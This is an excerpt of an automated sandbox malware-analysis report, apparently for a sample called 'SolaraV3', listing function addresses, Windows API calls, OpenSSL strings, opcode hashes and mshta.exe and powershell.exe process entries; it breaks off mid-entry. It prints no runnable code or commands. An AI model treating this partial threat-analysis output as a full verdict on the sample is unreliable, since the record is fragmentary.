Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007
String ID: ..\s\crypto\rand\randfile.c$Filename=
API String ID: 3568877910-2201148535
Opcode ID: b92129e8508862641eed399a8e5179a0bb6c7147643e5021365d23c2bd3b3ffe
Instruction ID: b426adcb18b199144a5d6d93dab1997cba6eb8a9153b0bc34aff202a2f847ac9
Opcode Fuzzy Hash: b92129e8508862641eed399a8e5179a0bb6c7147643e5021365d23c2bd3b3ffe
Instruction Fuzzy Hash: 2C317AE1A1978692EA20DB72E451FA97364FF94B84F408435DA4F877B5EF3CE5058B00

Function 00007FFB0C356540 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FFB0C35658D
SystemTimeToFileTime.KERNEL32 ref: 00007FFB0C35659D

Strings

gfff, xrefs: 00007FFB0C3565CF

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
Instruction ID: 56196cb56b7463eb892ab780850593854ca4595356788fe269b658816bb5a708
Opcode Fuzzy Hash: 5bab4889fdff038a34dd7d6efd02d934e11c3433e8613633f5b88581a3d60216
Instruction Fuzzy Hash: B92161F2A2464786DB948F39E515B79B7E0EB88B88F849035EA4D87798DF3CD5408700

Function 00007FF6DC71F5B8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF6DC71F5F8
GetCurrentDirectoryW.KERNEL32 ref: 00007FF6DC71F64A

Strings

:, xrefs: 00007FF6DC71F60E

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
Instruction ID: 8cff24189984a63b990c5bd06bcecd1fed1e8df0bfbff823a69f48a4aef32553
Opcode Fuzzy Hash: e8d367c4ea258391d160676196091cc4497c978f166048fd005a5cb1bdaac227
Instruction Fuzzy Hash: A4210772B0868581FB209B19D06427D73B1FB88B84F554137EA8D83694DF7CE966CB41

Function 00007FFB0C35175D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

00007FFB1C3B11F0.VCRUNTIME140 ref: 00007FFB0C395066

Strings

..\s\ssl\statem\extensions_srvr.c, xrefs: 00007FFB0C39507D, 00007FFB0C3950C1
3, xrefs: 00007FFB0C3950C8

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: 00007
String ID: ..\s\ssl\statem\extensions_srvr.c$3
API String ID: 3568877910-3555168737
Opcode ID: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
Instruction ID: 724d8ccf7e5f9c75a1d5a1d08722667b0ebf8099860c1132c838527492232a55
Opcode Fuzzy Hash: 6667dba7c5238e8d1662bf7e78e192f7ee7ee4d5288dc2d1f2b8f39ccf0876d4
Instruction Fuzzy Hash: CB21AEF2728B4186E7518B21E844BAC63A4EB48B84F584231DE4D47B95DF7DD6D0C700

Function 00007FFB0B81338C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON

Download Yara Rule

APIs

getsockname.WS2_32 ref: 00007FFB0B8D9F47
WSAGetLastError.WS2_32 ref: 00007FFB0B8D9F52

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFB0B8D9F06, 00007FFB0B8D9F68, 00007FFB0B8D9F84, 00007FFB0B8D9FB7

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ErrorLastgetsockname
String ID: ..\s\crypto\bio\b_sock.c
API String ID: 566540725-540685895
Opcode ID: 5eba5f4fb37063eb421bd785aab33e1d3d53f176506f7daf47244a11d094d287
Instruction ID: 8dd61f2013a47e9410adcb1bda4225053bc81b2a30eff3db5bc69462d3391caa
Opcode Fuzzy Hash: 5eba5f4fb37063eb421bd785aab33e1d3d53f176506f7daf47244a11d094d287
Instruction Fuzzy Hash: 54218CF1A0820686E720DB71D805EEE6364EF80305F848635E65E86AB4DF7DE585CB50

Function 00007FF6DC70FD48 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF6DC70FD98
RaiseException.KERNEL32 ref: 00007FF6DC70FDD9

Strings

csm, xrefs: 00007FF6DC70FDC6

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction ID: 4f0d37246fc5bd33a2aace6ee8c0f80a4060b6ed5d7b79440687495ec39ed506
Opcode Fuzzy Hash: b596af9f6a60738c50b353da5cbad86497326ffe12a5eabfdc94c01c9dae4a3e
Instruction Fuzzy Hash: DF112E32618B8582EB618F15E45025DB7E5FB88B84F584231EB8D47754DF3DD562C700

Function 00007FF6DC72073C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC72076C
GetDriveTypeW.KERNEL32 ref: 00007FF6DC7207AC

Strings

:, xrefs: 00007FF6DC720795

Memory Dump Source

Source File: 00000002.00000002.2046400546.00007FF6DC701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6DC700000, based on PE: true

Associated: 00000002.00000002.2046314384.00007FF6DC700000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046615459.00007FF6DC72B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC73E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046695461.00007FF6DC741000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2046842418.00007FF6DC744000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6dc700000_SolaraV3.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction ID: b338db340c7240531f884c48a7cc9dc90d0fe9680b0080e81536ea76b986b95a
Opcode Fuzzy Hash: 68237dfdc7112287ec82a3b365f776b5c9f6f856de5878160eaa1a8f91e0357f
Instruction Fuzzy Hash: F7018F22A1820A86FB30AF64947537EA7A0EF48744F941037D68DC2795EE2CE5268B24

Function 00007FFB0C356FA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32 ref: 00007FFB0C356FC6
SystemTimeToFileTime.KERNEL32 ref: 00007FFB0C356FD6

Strings

gfff, xrefs: 00007FFB0C35700A

Memory Dump Source

Source File: 00000002.00000002.2050155704.00007FFB0C351000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFB0C350000, based on PE: true

Associated: 00000002.00000002.2050110758.00007FFB0C350000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3E9000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3F4000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050155704.00007FFB0C3FE000.00000040.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050476741.00007FFB0C401000.00000080.00000001.01000000.00000010.sdmpDownload File
Associated: 00000002.00000002.2050521039.00007FFB0C403000.00000004.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0c350000_SolaraV3.jbxd

Similarity

API ID: Time$System$File
String ID: gfff
API String ID: 2838179519-1553575800
Opcode ID: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
Instruction ID: 2e06851da1746ea1516c992b07002f98d1807ea2321531fcfe1d82d766e0aa57
Opcode Fuzzy Hash: 47e4b42b83e78b7af79a6160f4da4c1814caf13c39811c5425ac0f60e84bf5e8
Instruction Fuzzy Hash: 6F01DBE2B2454542DF60DB35F805A59A7A0EBCC784B449031EA4DCB765EF3CD1418B40

Function 00007FFB0B8115AF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

00007FFB2ADB08A0.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FFB0B921F04

Strings

..\s\crypto\ct\ct_policy.c, xrefs: 00007FFB0B921EC3, 00007FFB0B921EDA
!, xrefs: 00007FFB0B921EE1

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: 00007
String ID: !$..\s\crypto\ct\ct_policy.c
API String ID: 3568877910-3401457818
Opcode ID: eea727c2c650749376e6f7709fbe9c773a3b3b2520ee859c13efa1a6d34b5bfc
Instruction ID: fca32d4fc1d07bf31e6e7bdcf89ad0092b723f110e0302e0b22b8897c24ce625
Opcode Fuzzy Hash: eea727c2c650749376e6f7709fbe9c773a3b3b2520ee859c13efa1a6d34b5bfc
Instruction Fuzzy Hash: 93F049B1F1A60282EB149B38D805BAD7395FF50705F948434DA0E967F1EE3CB655DA40

Function 00007FFB0B816BEA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21networkCOMMON

Download Yara Rule

APIs

ioctlsocket.WS2_32 ref: 00007FFB0B8DA102
WSAGetLastError.WS2_32 ref: 00007FFB0B8DA10E

Strings

..\s\crypto\bio\b_sock.c, xrefs: 00007FFB0B8DA124

Memory Dump Source

Source File: 00000002.00000002.2047840849.00007FFB0B811000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFB0B810000, based on PE: true

Associated: 00000002.00000002.2047797136.00007FFB0B810000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B81D000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B875000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B889000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B899000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0B8AD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA5E000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BA8B000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BABD000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB30000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB38000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB55000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2047840849.00007FFB0BB62000.00000040.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048908453.00007FFB0BB66000.00000080.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000002.00000002.2048955881.00007FFB0BB68000.00000004.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffb0b810000_SolaraV3.jbxd

Similarity

API ID: ErrorLastioctlsocket
String ID: ..\s\crypto\bio\b_sock.c
API String ID: 1021210092-540685895
Opcode ID: 874f4edec6eb816a1ff5eb4e5d2cc5ac46c60ec8e5f89df9828d11ec1872b5a1
Instruction ID: ae5a6e312222cf1163b0796a455ca3c0b640f8dccf7744732245fad2752b38f3
Opcode Fuzzy Hash: 874f4edec6eb816a1ff5eb4e5d2cc5ac46c60ec8e5f89df9828d11ec1872b5a1
Instruction Fuzzy Hash: C2E09AE4B19203C7F3206B70D816F7A2314EF14306F408934EA0FC66B0EE3DB6488A20

Analysis Process: mshta.exePID: 6484, Parent PID: 2564COMMON

Executed Functions

Function 000001E8E4120FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.1628231054.000001E8E4120000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001E8E4120000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_1e8e4120000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 9d16b409c9ec77d69d51ecf17be64236ccc05e7719b1bb189ec41b2aadbb4695
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 0E9002144D544656D91411954C4529C54407388250FD48584492ED0544E84D02962156

Analysis Process: powershell.exePID: 6044, Parent PID: 1660COMMON

Executed Functions

Function 00007FFAA95467F5 Relevance: .4, Instructions: 428COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1801758094.00007FFAA9540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2d6ade787ed357e6497a69de8cdf48d962bf20568a89c6b9dae304224742da2
Instruction ID: 84ec26f5eaa6ac2b6e51f5690b4679584a63626ddbf508c93b4602d8f5247a4f
Opcode Fuzzy Hash: b2d6ade787ed357e6497a69de8cdf48d962bf20568a89c6b9dae304224742da2
Instruction Fuzzy Hash: 91C15E7290FA8A8FEB95DB28D8566B57BD6EF9A310F1841BED04DC71C3D914980DC382

Function 00007FFAA9479E28 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abffac753f7c6b03a740501f83d72e8cfa5adf43ea15cd90bc4ae65dc1844149
Instruction ID: 984ad9717db845eb0a741ada6e68ed329c1d47497792a6ab78e02b86c95ca345
Opcode Fuzzy Hash: abffac753f7c6b03a740501f83d72e8cfa5adf43ea15cd90bc4ae65dc1844149
Instruction Fuzzy Hash: 6021AAA2C0EAC98FE7458F581C551A97F90FF6A304B5480BBE58CC62D7E9149A0DC3C1

Function 00007FFAA947A1B3 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34ecbc1695cbafc88a9ff785886c0a4bbbff67117dc511f868d33b613995a168
Instruction ID: 9852ff4471a4c0981996665c0e7930f4e6d0aabac0a35faba5b55a54c84883cd
Opcode Fuzzy Hash: 34ecbc1695cbafc88a9ff785886c0a4bbbff67117dc511f868d33b613995a168
Instruction Fuzzy Hash: 84215EA284E7C64FE702AB78D8255D57FB09F13215B0981F7D48DCA0A3EA189D58C7A2

Function 00007FFAA9479845 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa8896f8774f9bb3cd2eabd7eca81a21d5d0049de57dbb421b1c949369e40c0b
Instruction ID: 565b14306a03913e7d31346f53b5c7a096c385fdf3134273aad4f5ba78ff2e82
Opcode Fuzzy Hash: fa8896f8774f9bb3cd2eabd7eca81a21d5d0049de57dbb421b1c949369e40c0b
Instruction Fuzzy Hash: C841177191CB8C8FDB199B5CAC466E97BE0EF56321F04426FE48DD3193DA20A855CBC2

Function 00007FFAA935E620 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1799591334.00007FFAA935D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA935D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa935d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e267de694184f7042224271672bfb3ffd0ffd6950c5328a273208ac91d4bce88
Instruction ID: 07792f63c61870ca840826411f5b383191accbe031543de29bd95c2e36effa75
Opcode Fuzzy Hash: e267de694184f7042224271672bfb3ffd0ffd6950c5328a273208ac91d4bce88
Instruction Fuzzy Hash: 3741277180DBC49FE7568B299845A523FF0EF5B360F1505DFD088CB1A3D629A84AC7E2

Function 00007FFAA947B9BC Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6bcd09c1de63c8569c6f6e2340521d134de2ca7011bd335571ef8e17f1f0695
Instruction ID: ab6f21d630bb0a8c83626b80cf3df1f75b9d42aae60c0569a1af17c6cfe08799
Opcode Fuzzy Hash: f6bcd09c1de63c8569c6f6e2340521d134de2ca7011bd335571ef8e17f1f0695
Instruction Fuzzy Hash: 0221C57190CA4C8FDB58DF9CD84A7E97BE0EB99321F00816FD44DC3152D674945ACB91

Function 00007FFAA94733B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1800681454.00007FFAA9470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9470000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: 88cc23d79eb794b7af4e79960fe3fc061deb100e6f1e98f29b6d8e6c8227903f
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: C501A77010CB0C8FD744EF0CE051AA5B3E0FB89320F10052DE58AC36A1DA32E882CB45

Function 00007FFAA954432D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.1801758094.00007FFAA9540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAA9540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaa9540000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80e68014cc9b91165b47c17ebb391c07413e4b91b143e9cc4f1d171c15582066
Instruction ID: 5af8d83662ffaeaff1100a0c84d4706e75cc014a303c9f4b3df90d62fc585d92
Opcode Fuzzy Hash: 80e68014cc9b91165b47c17ebb391c07413e4b91b143e9cc4f1d171c15582066
Instruction Fuzzy Hash: 29F0B432A4D606CFD7A8EF1CE4418A877E1FF8932071100B6E14EC7063CA25EC89CB85

Function 00007FFAA95445E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

